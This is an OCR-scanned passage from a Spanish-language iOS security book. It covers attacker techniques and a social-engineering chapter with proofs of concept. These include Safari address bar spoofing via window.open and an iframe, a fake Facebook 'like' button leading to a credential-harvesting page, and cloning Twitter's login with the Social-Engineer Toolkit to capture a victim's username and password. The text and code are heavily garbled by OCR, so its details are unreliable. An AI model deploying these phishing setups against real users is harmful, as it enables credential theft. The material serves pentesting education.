File Key | |  Feky File Key |] File Key ] 


Fla Key | 


Tmagen 08.12: Fstructura de iPhone Data Protection. 
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Aunque, como se ha mencionado, la obtención de información del dispositivo sería muy similar a 
la realización de un análisis forense, un atacante tiene una gran ventaja con respecto a un analista 
forense, y es que el usuario se encuentra haciendo uso del dispositivo mientras el atacante tiene control 
sobre el mismo. Esto abre la posibilidad de emplear una serie de técnicas que un analista forense 
no podría emplear, como por ejemplo. 


Otra de las técnicas que se podrían emplear sería, directamente, instalar un TapTogger en el 
dispositivo. LI ZapLogging sigue un concepto idéntico al del KeyLogging, con la diferencia de que 
en un dispositivo ¿OS no hay teclas como tales, sino que hay que detectar la pulsación en la pantalla 
y determinar sobre que tecla se ha pulsado. En algunos casos se les llama simplemente KeyLoggers, 
aunque en realidad no se produzca ninguna pulsación de teclas. Si se busca en Cydia es posible 
encontrar software de este tipo. aunque a día de hoy el autor de estas lineas desconoce la existencia 
de alguno gratuito, 


Por último, una de las técnicas favoritas de algunos usuarios es hacer piggybacking. Ll concepto 
de piggubackingles, simplemente, aprovecharse del acceso legítimo de una persona para obtener 
un acceso ilegítimo. Un ejemplo cotidiano de piggybacking sufrido por cualquier usuario que haya 
utilizado el Metro, podría darse cuando una persona se pega a dicho usuario de tal modo que, al 
abrir la puerta con el billete legítimo (con torno es más complejo). pasa tras el usuario antes de 
que esta se cierro, Es seguridad informática el concepto es muy similar. En este caso, el atacante 
esperaría agazapado en la oscuridad esperando a que el usuario, por ejemplo, conectara a la VPN 
de la organización 


Un pentester normalmente desea poder utilizar toda su artillería de exploits una vez que ha tomado 
el control de un dispositivo iOS, y que mejor que usar Metasploit. Hace unos pocos años, Charlie 


Miller y Vicenza Lozzo, dos de los mayores expertos del mundo en seguridad de sistemas ¡OS, 
presentaban en BlackHal una charla Mamada EA Bliss: Meteoro or Pond Ga la 
que mostraban como cra posible portar el entonces no-oficial Macerpreier (Meterprete a OSX) 
para arquitectura ARM, con lo que era posible utilizarlo en sistemas iOS, ya que estos están basados 
en la misma arquitectura OSX. 


Durante algún tiempo, existió un Meterpreter para Mac OS X oficialmente soportado por el equipo 
de desarrollo de Metasploit, pero en la actualidad no se mantiene soportada su versión de OSX ni de 
108 en la rama oficial. No obstante, existe la posibilidad de encontrar el código fuente en Internet 
y adaptarlo a un sistema ¿OS que sea más actual. Con este, u otro tipo de payload, sí que se tendría 
la posibilidad de utilizar el dispositivo ¿OS como puerta de entrada a la organización y atacar los 
sistemas internos, 
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ding stage (3884 bytes). 
A 


9. Conclusión 


Este capítulo ha explicado cómo adaptar un exploit utilizado para hacer Jailbreak en terminales ¡OS 
remotamente para crear una herramienta de pentesting. Por desgracia solo es funcional en terminales 
con versiones inferiores a ¡OS 4.3.3, por lo que solo podrá usarse con ellos. No obstante, este mismo 
trabajo puede cxtrapolarsc a próximos exploits que sean descubiertos y que afecten al To 


Información de todos los dma pe. conocidos pueden localizarse hoy en día en 
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Capítulo IX 
Ingeniería social y client-side en iOS 


1. Ingeniería social 


La ingeniería social es la vía o medio por el que usuarios con fines maliciosos, también denominados 
delincuentes, manipulan a todo tipo de usuarios con el fin de lograr acceso ilícito a información 
sensible de dicho usuario. Esta información puede ser desde una escalada de privilegios, credenciales, 
acceso no autorizado a ciertos recursos, suplantaciones de identidad, etcétera. 


La ingeniería social tiene como principio elemental que en todo sistema la parte más débil es el propio 
usuario. Hoy en día las nuevas tecnologías forman parte de la vida de las personas, y con mayor o 
menor preparación, todo el mundo utiliza medios telemáticos con los que pueden ser engañados. 
Además, la irrupción en el mercado de los SmartPhones ha marcado un antes y un después en el 
consumo de estos dispositivos. El mercado marca las reglas, y todo hace indicar que el volumen de 
SmartPhones será mucho mayor que el de los equipos personales u ordenadores. Por esta razón se 
debe concienciar a todos los usuarios que manejen este tipo de dispositivos en las empresas. 


Los medios comúnmente utilizados por el ingeniero social o usuario malicioso son el teléfono e 
Internet. En ciertas auditorías de Ethical Hacking se utilizan ataques dirigidos, en las fases de APT, 
Advanced Persistent Threat, con el fin de comprobar el nivel de concienciación de empleados. El 
ingeniero social puede utilizar técnicas como son la suplantación de sitios web, envio de mails 
spoofeados con peticiones de acceso a algún sitio en conercto donde se deba introducir credenciales, 
envío de SMS falsos con enlaces a sitios web bajo el control del usuario malicioso, etcétera. Este 
tipo de técnicas han avanzado y evolucionado en gran medida, se encuentran muy optimizadas y 
cualquiera podría caer en ellas. Este hecho hace que, a día de hoy. diferenciar la web falsa o phishing 
sea rcalmente dificil para un usuario con nivel medio. Además, cabe destacar que la informática 
es utilizada en su inmensa mayoría por usuarios con nivel básico o medio, lo cual hace que la 
informática sea imprescindible para todos, y por otro lado hace que el peligro del desconocimiento 
aceche a estos usuarios. 


Generalmente los usuarios disponen de un comportamiento predecible, es decir, realizan acciones de 
manera automatizada cuando acceden a ciertas páginas web, por lo que si este no loma las medidas 
adecuadas, puede ser estafado vía Internet. Como ejemplo se puede entender un phishing de la 
página web de un banco, en el que tras introducir sus credenciales se redirige al banco original o se 
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alerte, mediante uma notificación, de que el sitio web no se encuentra disponible en este momento. 
Hoy en día este simple hecho sigue funcionando y provocando las pesadillas de algunos usuarios que 
han caído en esta clásica trampa. Los phishing han evolucionado y ya aparecen, con gran calidad, 
en los dispositivos móviles, incluso embebidos en algunas aplicaciones con millones de usuarios, lo 
que hace reflexionar sobre la calidad de dichas aplicaciones. 


Uno de los ataques más comunes, y también más sencillos, e incluso electivos, es engañar a un 
usuario para que piense que un sistema le está solicitando su credencial de acceso para ciertas 
acciones. Loy en día es dificil librarse de este tipo de phishing, que en muchas ocasiones, son 
despreciados por el simple hecho de ser repetitivo. El típico phishing de credenciales de cuentas 
de bancos, tarjetas de crédito, etcétera, es muy común, pero no significa que ya no sea efectivo. 
Este tipo de phishing enviado de manera masiva puede proporcionar un ratio de éxito bajo, pero 
suficiente para el delincuente, Por este hecho, los bancos y propietarios de este tipo de sistemas 
advierten periódicamente a los usuarios para que no revelen ningún tipo de información sensible 
ante estas peticiones, ya que este tipo de información no se solicita por estas vías. 


La clonación de objetos que identifiquen cierto sitio web puede provocar el éxito del phishing, y 
de la misma manera ocurre con los dispositivos móviles. Los sitios web suelen ser más sencillos y 
con menor cantidad de objetos, optimizados para dispositivos móviles. Por este motivo el phishing 
puede resultar más sencillo y creíble. i 


provocar la instalación de un perfil para dispositivos móviles, por ejemplo en ¡¿OS, tras la visita de 
un sitio web que suplante al sitio corporativo, Ll objetivo de la instalación de dicho perfil puede ser 
la obtención de los UDID, IMEI, y otros identificadores o información del usuario que pueda dar 
algún valor a dicha acción. 


Por otro lado cuando, mediante la ingenieria social, se consigue troyanizar un dispositivo, ya sea un 
equipo o un dispositivo móvil, este pasa a formar parte de una botnel, 


ista vía de ataque es muy frecuente, y aunque 
puede que el ratio de éxito sea bajo, al realizar en oleadas de spam, se puede lograr una cantidad 
importante de dispositivos troyanizados. 2 


Históricamente, y como se puede visualizar en gran cantidad de películas con temática hacker, 
la ingenieria social presenta su cara más espectacular en el trato personal con los usuarios, con el 
que se puede oblener acceso a los importante conocer a la víctima, su rol, su edad, su 
concienciación, su puesto de trabajo, etcétera. Cuanto mayor detalle más probabilidades de éxito, ya 
que el conocimiento siempre dará ventaja al ingeniero social. 


Para subir el razio de éxito en los ataques de ingeniería social en auditorias se debe tener en cuenta la 
confianza del usuario sobre la entidad, un nivel aceptable en la falsificación presentada, introducción 
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de objetos que ayuden a aumentar la confianza del usuario. como puede ser el protocolo HTTPS, 
imágenes con el candado de zona segura, optimización del recurso para los dispositivos móviles, 
una historia con gancho como pueden ser los típicos concursos navideños en las empresas, etcétera. 


El ingeniero social más famoso es Kevin Mimick, y para él esta técnica se basa en SUAO pnCIpios Y 
2.La famosa address bar de Safari 


¿Por qué es famosa la address bar del navegador por defecto de 10.5? Realmente por nada bueno. La 
barra de direcciones del navegador de ¿OS indica, como otras barras de navegación en que sitio web 
se encuentra el usuario actualmente. ¿Se puede modificar? La respuesta es sí. se ha podido modificar 
en versiones anteriores de iOS, y lo más curioso de la historia es que este tipo de spoofing se resiste 
a desaparecer en las versiones más modernas de iOS. 


Existe una vulnerabilidad que permite que dispositivos ¿OS con ciertas versiones del sistema 
operativo sean engañados, es decir, que la dirección URL que la address bar anuncie o indique no 
sea la verdadera dirección donde el terminar se ha conectado. Este hecho es realmente interesante y 
abre una vía a la ingeniería s 
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¿Qué es el address bar spoofing? 


. Este tipo de técnica es utilizada en cien 
esquemas de ataques de phishing, en los que un usuario malicioso intentará robar credenciales u otra 
tipo de información haciendo pensar al usuario legítimo que se encuentra en el sitio adecuado, 


En otras palabras la address bar spoofing es provocada por unas líneas de código malicioso que 
modifica el contenido de la barra de direcciones del navegador de un usuario para forzar al propio 
navegador a cargar una página web a elección del usuario malicioso. 


Como se puede entender de estas definiciones la idea es sencilla, si el navegador es vulnerable se 
podrá realizar dicha acción con el fin malicioso de realizar un phishing, casi perfecto. Generalmente, 
es la barra de direcciones la que da el primer sintoma de sitio web falso a un usuario, ya que se puede 
encontrar una dirección IP o un nombre de dominio que no corresponde con el sitio web real. Con 
esta técnica, el phishing toma una cara nueva, ya que aparentemente, la na de direcciones no suele 
engañar al usuario real de donde se encuentra. 


Historia en iOS y OS X de este tipo de vulnerabilidades 


Vulnerabilidades del tipo address bar spoofing en los dispositivos de Apple, ya sean equipos o 
dispositivos móviles, no son nuevos. Históricamente se puede encontrar algún que otro caso, tanto 
para los equipos Mac, como para los dispositivos iOS. 


En el caso del navegador Safari para Mac OS X, la versión 5.1.4 solucionaba 83 vulnerabilidades 
en el software, entre las que se incluia una que permitía a un atacante modificar el contenido de la 
barra de direcciones. De este modo un usuario podría ser fácilmente engañado mediante el uso de 
dicho navegador. 


Hoy en día los navegadores web no permiten que los sitios web modifiquen el texto que aparece 
en la barra de direcciones, y es bastante lógica su razón. En algunos casos los navegadores 
pueden permitir a ventanas emergentes ocultar la barra de direcciones, pero en tales casos la URL 
se mostrará en el título de la ventana. La razón de dichas acciones o de este comportamiento es 
sencilla, si los navegadores pudieran ser influenciados por las aplicaciones web que muestran para 
ocultar la dirección URL o modificar el contenido de dicha barra de direcciones, las aplicaciones 
web maliciosas podrian falsificar fácilmente las direcciones URL y engañar a los usuarios, Sería un 
vector de ataque enorme para el phishing y lo peor seria que resultaría sencillo engañar al usuario. 


En el sistema operativo ¡OS, antes de que una grave vulnerabilidad de address bar spoofing fuera 
explotada en la versión 5, se conocia una prueba de concepto del investigador Nitesh Dhanjari con 
la que se realizaba un phishing sencillo de la barra de direcciones pero muy peligroso. 
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La idea era muy sencilla empujar la barra de direcciones fuera del área visible del usuario. ¿Y eso se 
podia hacer en un ¿OS? La respuesta es afirmativa. Mientras que los navegadores intentan informar 
correctamente en qué página se encuentra el usuario, un dispositivo ¿OS, por decisión de diseño, 
permitía al programador del sitio web empujar la barra de direcciones fuera de la zona visible por el 
usuario. El objetivo no era otro que generar un mayor espacio útil en la pantalla del dispositivo. Este 
hecho estaba dando lugar a un vector de ataque muy peligroso, orientado al phishing. 


El investigador explicó en el año 2010 como era suficiente empujar hacia arriba la barra de 
direcciones dejándola fuera de la vista del usuario y “pintar” una nueva barra de direcciones falsa 
con el nombre del sitio web que se quería suplantar. Este hecho tan simple como peligroso fue uno 
de los primeros ataques de la técnica address bar spoofing que se explica en este capitulo. En la 
imagen se puede visualizar este problema. En el ¡Phone de la izquierda se puede visualizar como se 
obtenía el phishing realmente, la barra de direcciones es totalmente falsa, mientras que en el ¡Phone 
de la derecha se puede visualizar lo que está ocurriendo realmente, la barra de direcciones real es 
desplazada hacia arriba quedando fuera del área visual del usuario. 
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Iumiigen 09-02: Ejemplo de phtsiting del investigador Naresh Dhanjari en el uño 2010. 


En marzo de 2012 David Viera-Kurz publicaba una nueva forma de realizar un ataque de address 
bar spoofing en dispositivos iOS. Este ataque afectaba al que por entonces era el nuevo flamante 
sistema operativo móvil de Apple, ¡OS 5. Este ataque afectó hasta la versión 5.7, parcheándose en la 
versión 5. /.] para la cual ya no es válido el ataque de address bar spoofing. No es válido en todo su 
esplendor, porque realmente lo que se consigue es que la barra de direcciones se quede en blanco, lo 
cual puede no ayudar mucho a evitar el phishing en un usuario no avanzado. 
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¿En qué consistia el ataque? El fallo o vulnerabilidad se produce por la existencia de un error en la 
ejecución de la función Windows.opent) en JavaScript. La implementación de esta función del Apple 
534.46 permite realizar este ataque en el navegador de iOS. La vulnerabilidad se detalla en la 
Como curiosidad cabe 
destacar que la vulncrabilidad en ¿OS 6 y superior sigue mostrando la barra de direcciones en blanco, 
por lo que un usuario cualquiera puede caer en este phishing sin darse cuenta. 


Otra de las curiosidades de las que informó el investigador David Viera-Kurz fue la línea temporal 
de acontecimientos que ocurrieron desde que descubrió este address bar spoofing: 


El | de Marzo de 2012 se identifica la vulncrabilidad cn ¡OS 5.0, ese mismo día esa misma 
vulnerabilidad es reproducida en la versión 5./ de iOS. El día 2 de Marzo de 2012 el fabricante, 
es decir, Apple es informado de dicho fallo de seguridad. El día 3 de Marzo Apple responde al 
investigador. El 20 de Marzo de 2012 se publica un advisory con detalles parciales. Apple trabaja 
para solventar este agujero de seguridad y el 7 de Mayo de 2012 liberan un parche para ¡OS 5.1.4 
que solventaba el problema de la udebress bar spoofing. El día 8 de Mayo de 2012 fue publicado el 
advisory con todos los detalles y una prueba de concepto asociada. 


3.PoC: Address bar spoofing en ¡OS 


En esta prueba de concepto se presenta un ejemplo, publicado por el investigador David Viera- 
Kurz, donde se puede visualizar de manera gráfica y sencilla el funcionamiento de la técnica en 
un dispositivo ¡OS. El dispositivo que se utilizará es un iPhone, tanto 3GS, 4 y 45. El resultado no 
dependerá del dispositivo que se esté utilizando, pero se quiere reflejar que valdría con cualquier tipo 
de dispositivo de Apple, no excluyendo al iPad ni al iPod touch. 


Enla siguiente dirección URL se puede encontrar una prueba de concepto que presenta el investigador 
mencionado anteriormente htip://majorsecurity.net/himi5hos51-demo.html. En este sitio web se 
presenta un botón que debe ser pulsado desde un dispositivo ¡OS, en este caso un iPhone, para 
cargar un ¿iframe con la página web real de Apple, pero dicho ¡frame se encuentra embebido en un 
sitio web que no pertenece a Apple. 


Cuando esta prueba de concepto se realiza con una versión vulnerable a address har spoofing, la 
barra de direcciones indicará que el sitio web en el que se encuentra el usuario es el sitio web de 
Apple, lo cual no es cierto ya que simplemente el ¿frame embebido en el sitio web se encuentra en 
dicha web. 


Si la prueba de concepto se realiza con un ¡OS superior o igual a la versión 5. 1. / la barra de direcciones 
no será spoofeada, pero aparecerá en blanco. Este hecho no ayuda al usuario a evitar el spoofing, ya 
que el usuario no avanzado puede no entender el significado de la barra de direcciones en blanco. 
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Configuración y ejecución 

En primer lugar se utilizará un ¿Phone con ¡OS 5.1, el cual es vulnerable a la técnica aderess har 
spoofing. Arrancando cl navegador móvil Safari se accederá a la siguiente dirccción URL hnp:// 
majorsecuritv.net/htmi5/5os51-demo.huml donde se podrá visualizar el sitio web que se muestra en 
la imagen. 


iPad mini 


CEN 


Tras visitas este sitio web se muestra un ¡frame en la parte inferior que carga el sitio web de Apple, 
en su versión de habla inglesa. Pura comenzar la prueba de concepto se debe, desde el dispositivo 
iOS, pulsar en cl botón que indica “Demo”. Tras la pulsación en dicho botón se abrirá una nueva 
pestaña y se llegará a un sitio donde se vuelve a cargar un iframe, de mayor tamaño, con el sitio web 
de Apple en lengua inglesa. 


Como el dispositivo ¡OS utilizado dispone de un sistema operativo con versión 5.7 se obtiene la 
dirección htp:/4www.Apple.com en la barra de dirceciones. 


Cabe destacar que en la parte de arriba, escrito en el propio código HTML, y para que cl usuario 
pueda visualizar claramente que se encuentra en un sitio web no perteneciente a Apple. se escribe 
el siguiente texto: "This is still hosted on MajorSecurity.net, but the the adressbar is being spoofed 
and is pointing to another FQDN. Scary”. 


Con esta sentencia se quiere demostrar que el iframe se encuentra realmente embebido en la web, y 
que aunque la barra de direcciones indique que el usuario se encuentra en el sitio web de Apple este 
hecho no es cierto. 
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Si se accede desde un ¿Phone, o dispositivo iOS. con una versión 5././ del sistema opcrativo o 
superior no se podrá obtener el mismo nivel de confianza por parte de la víctima, es decir, el usuario 
visualizará una barra de direcciones en blanco, aunque el phishing seguirá siendo cargado en el 
iframe, y no existirá ninguna notificación que pueda alertar al usuario. 


El simple hecho de que la barra de direcciones aparezca en blanco no alertará, por lo general, a un 
usuario no avanzado, Hay que recordar que, hoy en día, la mayoría de los usuarios de las nuevas 
tecnologías no son usuarios avanzados y este hecho puede ayudar a que el intento de phishing 
obtenga el éxito buscado por el atacante. 


The new ¡Mac 


Pacman aad ceson Taren right the ecos 
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4. PoC: Personalizando el ataque 


En esta prucba de concepto se configurará un servidor web el cual realice la técnica de address 
har spoofing, para que se personalice el ataque todo lo posible. Se realizará la configuración de un 
sitio web falso, el cual pida ul visitante alguna credencial y, para versiones vulnerables a la técnica 
estudiada en ese capítulo, se presente información no verdadera cn la barra de direcciones, 


Manos a la obra 
Se utilizará un servidor SAM ya que el sitio web malicioso se ha preparado en sistemas Microsoft 
Windows. pero se podría utilizar un servido. jara sistemas GNU/Linux, OMAMB para llevar 
a cabo la prueba en un equipo Mar OS X. 


El código que provoca cl address bar spoofing se comentará en las próximas líneas, es recomendable 
entender lo que realiza dicho código, en su mayoría código JavaScript. Ll código original propuesta 
por el investigador proporciona al usuario ima página web. que dispone de un botón que al pulsado 
realiza la técnica de address bar spoofing. ¿Por qué no lanza directamente la página web malicioso 
con la barra falsificada? Lin primer lugar porque es una prucha de concepto y en segundo lugar 
debido a que, generalmente, los navegadores bloquearán las funciones JavaScript que intenten 
realizar aperturas de nuevas ventanas en la carga de un sitio web. Se puede buscar la manera de 
conseguir este hecho si la acción fuera para realizar una acción maliciosa, hay que tenerlo en cuenta, 


YPE ETM PUBLIC "-//M30//DTD NTML 4.01//EN"> 


5 bar spooling pi 
“text/htm; 


En esta parte inicial de código se puede visualizar como se pone título a la ventana inicial. Además se 
configura el charset y la cabecera del documento. Se podría intentar declarar la función JavaScripti 
de carga de la técnica de address har spoofing en esta parte del código e invocarla cn el hody, pero 
muy probablemente Safari bloquearía dicha acción, por lo que habrá que buscar otra opción para 
hacer llegar el phishing, por ejemplo con ingenicría social. 

<body> 

e-t 
<1egone 


or 


En esta parte del código comienza la sección body del sitio web. En esta parte se puede visualizar 
como se indica un mensaje “Some payment/hank website included here.”, con este mensaje el 
investigador da ideas sobre para que se puede utilizar esta prueba de concepto en manos maliciosas. 
Además, sc incluye un botón que deberá ser pulsado para acceder a la prueba de concepto en si. 
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Lo más sencillo para la personalización de esta prueba de concepto es generarse una página similar 
con un botón decorado para afianzar la confianza del usuario. Otra de las maneras seria hacer que el 
código JavaScript se ejecute en la carga del sitio web, quizá la mejor manera para un phishing real. 


<script type="text/javascript”> 
document .getklementkyId (tone") onclick = function () 


$ 


myhlindow=window. ops: 
cation=yes’ ); 


(http://www. apple.com’ ,'eintitel’,” width=200, height=100, 1o 


myWindow. document.write ( 

<ntml>Mmead></head><boc 
<strong>This is still hosted on Maj 
ēdressbar is poofed and is pi 


</strong> 
<br><i 
<iframe src=\"http://www.apple.com\”);></iframe></script></body> 
</html>”) 7 


nyWindow. focus (); 
, 


</seripi> 


En esta parte del código se visualiza ció sripah as iza realmente la 
suplantación. 


Tras explicar el código original de la prueba de concepto se va a proceder a la modificación para 
preparar la prueba de concepto personalizada. Se creará un fichero denominado poc.html o incluso, 
si se quiere añadir algo con lenguaje PHP se podría crear un archivo denominado poc.php. En esta 
parte de la fase de ingeniería social toda idea con imaginación puede ayudar al éxito de la acción 
frente a la victima. 


Este fichero, poc.php. se incluirá, por ejemplo, en un servidor el cual ha sido hackeado y se tiene 
acceso, o al que se ha subido una y se dispone de privilegios para subir y modificar archivos 
de un sitio web. Otra opción es utilizar un servidor propio en el que se publique algo conocido 
por la víctima. El atacante quiere utilizar este servidor como fuente de confianza, por ejemplo, 
supóngase que se hackea una web de una famosa marca de ropa, la cual enlaza con un banco para 
realizar un pago o simplemente enlaza a otros sitios web donde se necesita incluir un usuario y 
contraseña para acceder a una zona interna. Es esta segunda web, y no la de la famosa marca de ropa, 
la que será victima de phishing. y ayudándose en la address bar spoofing, engañar al usuario que 
acceda mediante el dispositivo ¿OS. Para realizar las acciones de manera procedimental se presenta 
el siguiente esquema: 
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- Creación del fichero que se encargará de, mediante la utilización de un botón, invocar 
a la nueva ventana con el sitio web falso y la barra de direcciones spoofeada, Este fichero 
puede ser alojado en un servidor propio del atacante, con dominio en Internet para no levantar 
sospecha, o si el atacante tiene acceso a algún servidor, por así decirlo de alguna marca 
reconocida en Internet, aprovecharía esto para ganar la confianza de las victimas. 


- En esta prueba de concepto se utilizará un botón de Facebook, el cual tras ser pulsado 
desde el dispositivo iOS, ¿Phone en este caso, abrirá un sitio web falso preparado para recoger 
los login de Facebook. La idea es presentar a la victima que cuando pulse sobre el botón 
típico de compartir en Facebook, se abrirá en su dispositivo una ventana que le pedirá las 
credenciales, como si la sesión hubiera caducado. Este sitio es falso, aunque en la barra de 
direcciones indicará que es Facehook. Hay que recordar que la versión de ¡OS será una 5.1. 


- Una vez se presenta el sitio web falso a la víctima, si esta dispone de un ¡OS 5./ su barra 
de direcciones habrá sido spoofeada, si por el contrario dispone de una versión superior la 
barra de direcciones aparecerá vacía. En cualquiera de los dos casos, las posibilidades de 
éxito son altas en un posible ataque de phishing real. 


En la siguiente imagen se puede visualizar el botón de “Me gusta” de Facebook. Este botón no es 
exactamente el mismo botón, es una copia y esta personalizado para que cuando se haga click sobre 
él se ejecute la función JavaScript explicada en este mismo capítulo. i? 


Imagen 09.06: Botón falso que activará phishing y address bar spoofing. 


Una vez las víctimas pulsan sobre el botón se abre una nueva ventana con la que aparecerá un iframe 
que ocupa la pantalla o la mayor parte de visión posible. La página interior es una copia preparada, 
incluso con conexión a base de datos, del propio WAMP, para almacenar las credenciales. En esta 
imagen no se visualiza ningún mensaje, como en la prueba de concepto original, estaría preparado el 
phishing para engañar lo mejor posible a la victima. La barra de direcciones es spoofeada indicando 
la dirección que se indique en el JavaScript. 
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Para comprobar que realmente es un ¡frame y que no se encuentra realmente en dicho dominio se 
puedo visualizar la siguiente imagen. Se puede comprobar como la prucba de concepto original ha 
sido modificada para mostrar, en este instante, un mensaje que indica que el sitio web de abajo cs 
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Imagen 09.08: iframe debajo de la línea que informa que es phishi 
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5. Herramientas que ayudan a la ingeniería social 


Ln la App Store existen gran cantidad de herramientas que, inconscientemente, ayudan a realizar 
trabajos de phishing. ¿Esto es permitido por Apple? Realmente la funcionalidad de la aplicación es 
otra, pero un atacante puede utilizarla para realizar un phishing bastante aceptable. Además, con la 
ayuda de SET, Social-Engineer Toolkit, se puede automatizar el proceso de phishing sin necesidad 
de configurar entornos más avanzados o más complejos. 


Las aplicaciones que pueden ayudar, y mucho, al phishing en dispositivos ¡OS con las que permiten 
la aparición de navegadores embebidos. Listas aplicaciones intentan mostrar una presentación de 
unidad y gran presencia sin contar con el peligro que puedo suponer para el usuario final. Como 
ejemplo se hablará más delante de la aplicación de Twitter para ¡OS con la que los usuarios pueden 
abrir los enlaces de los Tweets en la propia aplicación gracias a la clase UZWebView. Esta clase 
despliega la información web embebida en la aplicación sin necesidad de salir de la misma, en otras 
palabras. el usuario puede ver la información en la aplicación sin abrir el navegador Safari. Lista 
clase está basada en Safiwi pero no requiere cerrar la aplicación para que los contenidos se muestren, 


¿Dónde reside el problema de estos navegadores embebidos? Fs realmente sencillo, su barra de 
direcciones. La barra de direcciones no es mostrada por lo que el usuario no puede ver a simple vista 
si el sitio que accede es realmente cl que parece. No es un address bar spoofing, ya que es el propio 
componenente 11 WebView el que trabaja así por defecto. Como solución, se indica cl sitio web al 
que se accede en la barra del título de la aplicación, pero esto sucede durante un breve periodo de 
tiempo, Después aparece en la barra de título de la aplicación cl nombre del sitio web, el cual puede 
ser fácilmente manipulado. 


En la siguiente imagen se puede visualizar como al abrir un link de un Tweet se puede obtener la 
página sin barra de dirección asociada, por lo que no se puede saber si el sitio es verdadero o no. Otra 
dificultad para los usuarios es que los shoríner de direcciones URI., se encuentran muy difundidos en 
Twitter, haciendo ver qué el envio de un link con shorter en Twitter es un hecho normal. 


Imagen 09.09: Navegador web embebido cn Fwitter de un sitio móvil. 


iPhone & iPad 


Pantalla Pública XIX 
a 


Imagen 09.10: Navegador web embebido en Twitter 


SET: Social-Engineer Toolkit 


Es un script que proporciona al atacante un conjunto de herramientas relacionadas en su totalidad 
con la ingeniería social. Liste conjunto de herramientas se integra fácilmente con Metasploit para 
obtener incluso sesiones inversas, es decir, la intrusión a los sistemas remotos que se están atacando. 


Lsta toolkit ofrece un script que centraliza todas las funcionalidades necesarias para realizar ingeniería 
social a través de medios telemáticos. Se puede decir que es piratería de la mente humana. El objetivo 
de SET es utilizar la ingeniería social en todas las vías telemáticas desde el engaño mediante SMS, 
hasta la suplantación de páginas web, pasando por la ingeniería social en dispositivos físicos 


Muchos especialistas opinan que la ingenicría social es un gran riesgo en la actualidad. Aunque 
día a día las personas van estando más concienciadas, las técnicas de ingenicría social avanzan y 
los métodos son cada vez más complejos. Los dispositivos móviles son un nuevo foco en el que el 
engaño puede ser hecho con bastante facilidad y SET ayudará a estas pruebas de concepto que se 
presentan en este capítulo. 


Select from the menu: 


spear-Phishing AlLack Vectors 
Website Attack Veclors 
Infectious Media Generator 
Create a Payload and-LisLener 
Mass Mailer Attack 

Teensy USB HID Attack Vector 


SMS Sponfing Attack Vector 
Wireless Access Point Attack Vector 
Third Party Modules 

. Update the Metasploit Framework 

. Update the Social-Engineer Toolkit 
Help, Credits, and About 

| Exit the Social-Engineer Tonlkit 


Enter your choice: 2 


Imagen 09,11: Menú de SET. 
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Para la prueba de concepto se utilizará SET, el cual se encuentra en la distribución de GNU/Linux 
para auditoría de seguridad BackTrack 5. SET se encuentra disponible en la siguiente ruta, en una 
distribución BackTrack 5, pentest/exploits/ser. 


6.PoC: Hacking con Twitter 


En esta prucba de concepto se utilizará SET para realizar un clon del sitio web de Yivitter con el 
objetivo de disponer en un servidor o una máquina local de un inicio de sesión falso de esta web. 


Para llevar a cabo esta acción se debe arrancar SET y su utilizará la sn 
Egr a técnica permite al atacante montar un sitio web similar al real con el objetivo 
a 


'olectar las credenciales de la víctima. Para esta prueba de concepto se parte del siguiente 
escenario: 


- Alacante con una máquina BackTrack 5 con un servidor web el cual facilitará el sitio falso 
a las víctimas. 


- La victima recibirá un Twee a través de Twitter con un link acortado, el cual al resolverse 
mostrará en la aplicación un navegador embebido con el sitio web falso. La víctima no 
visualizará ningún dominio v dirección 1P extraña, por lo que no perderá la confianza en lo 
que está viendo. 


- Para engañar a la victima, cuando esta acceda a ejecutar el Zirk llegará a un sitio web de 
inicio de sesión de Twitter, como si la sesión hubiera caducado. 


A continuación se procede a realizar la configuración del servidor para clonar el inicio de sesión 


de Twitter. En primer lugar, tras ejecutar SET, se debe elegir la opción dos del menú principal 
denominada “PEREA NACO] 


elect fron the menu: 


f. Spcar-Phishing Attack Veclurs 
Vehsite Attack Vectors 

Infectious Media Generator 

Create a Payload and Listcner 
Mass Mailer fttack 

-  Tcensy USD HID Attack Vector 

- SMS Spoofing Nttack Vector 

- Vircless Access Point Attack Vector 
. Third Party Mudules 

O. Update the Metasplait Framevork 
(11. Update the Social-Engincer Toolkit 
12. Help, Credits, and About 

13. Exit the Social-Engineer Toolkit 


mter your choice: 2 
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Tras elegir el vector de ataque ha; utilizará. En este caso se pulsará la 


opción número tres, denominado 


En esta técnica se pedirá si se quiere utilizar una plantilla de las que proporciona SET o utilizar un 
clonado in situ de un sitio web. Cabe destacar que SET cs capaz de realizar una copia de un sitio 
web, aunque esla esté bajo SSL. 


Tt] Uehsite Attack Vectors 11] 


. Meb Templates 
. Site Cloner 

- Custon Inport 

. Return Lo main menu 


Imagen 09.13: Elección de clonación de sitio web 


En este ejemplo la dirección IP del sitio clonado es 192.168.0.61, por lo que en el /ink que se enviará 


por Twitter apuntaría a esa dirección IP. El envío del Tweet debe ser lo más natural posible para qu 
el mayor número de usuarios tengan la confianza para acceder a dicha URL. 


Tweet 


eetorenseoa 
@victima_i64_iphone Mira tu foto 
del fin de semana pasado! bit.Jy/ 
bKFggK 


manu 


e n k u f 


Imagen 09.14: Recepción de weet malicioso 


El usuario tras recibir el Tweet puede abrirlo o no abrirlo. Este hecho dependerá de la confianza 
que le suscite el mensaje. Este es el momento de la ingeniería social más imaginativa. Lste es un 
ataque que ha permitido el robo de credenciales de famosos, gracias a las nuevas tecnologías y el 
desconocimiento de éstas. 


http//tco/NspX.... Œ 
Pp | 


Imagen 09.15: Apertura del navegador embebido 


Se puede visualizar como al abrir el link se muestra el navegador embebido en la aplicación y en la 
barra de titulo se muestra la dirección URI.. Esta dirección URL que se muestra está acortada. por lo 
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que no levantará sospechas en los usuarios víctimas. SERA Nizado bitly para realizar dicha acción, 
perosse puede utilizar otros shortuers con el mismo resultado positivo, 


Dunigen 09:16: Web de Tvirter no real mastaa enel navegador cmbebidó 


Tras la carga del sitio web la barra del título solo indica Xwitter, por lo que cl usuario no sospecharia 
ninguna acción maliciosa. La página que se muestra es la del login, por lo que la victima puede 
suponer que se ha caducado la sesión y debe introducir sus credenciales. 


Se ha suplantado el sitio web normal, el que no:se- encuentra optimizado para sitios móviles. Se 
podría haber suplantado el siio web móvil de Tvitter o incluso realizar un sitio web que imile ul 
inicio de sesión en la aplicación. Con estos últimos retoques se habría conseguido más realismo del 
que ya desprende. 


1192.168.0.157 — — [Z0-Dec-2012 11:35:46] "GET / HIIP/1.1" 200 — 
[x] WE GOT A HIT? Printing the output: - 

POSSIBLE USERNAME FIELD FUND: session[usernanc_or_emai] 
IPUSSIBLE PASSWORD FIELD FOUND: session[passuord1-123abc. 
